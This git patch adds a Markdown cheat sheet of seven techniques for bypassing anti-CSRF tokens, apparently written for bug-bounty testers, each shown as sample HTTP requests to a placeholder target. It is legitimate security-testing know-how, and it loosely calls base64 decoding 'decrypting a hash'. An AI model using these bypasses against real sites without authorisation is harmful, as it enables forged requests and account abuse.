From 1c09b8a9eb1c003e8f89b692408e124f3752888a Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Sun, 20 Sep 2020 00:04:29 +0700
Subject: [PATCH] Bypass CSRF [1]

Create bypass CSRF tips and add 7 tips
---
 BypassCSRF.md | 103 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 103 insertions(+)
 create mode 100644 BypassCSRF.md

diff --git a/BypassCSRF.md b/BypassCSRF.md
new file mode 100644
index 0000000..f743375
--- /dev/null
+++ b/BypassCSRF.md
@@ -0,0 +1,103 @@
+# Bypass CSRF Token
+1. Change single character
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaabaaaaaaaaaaa
+```
+
+2. Sending empty value of token
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=
+```
+
+3. Changing POST / GET method
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
+Host: target.com
+[...]
+```
+
+4. Remove the token from request
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456
+```
+
+5. Use another user's valid token
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
+```
+
+6. Try to decrypt hash
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=MTIzNDU2
+```
+MTIzNDU2 => 123456 with base64
+
+7. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=vi802jg9f8akd9j123
+```
+When we register again, the request like this
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=vi802jg9f8akd9j124
+```
+If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part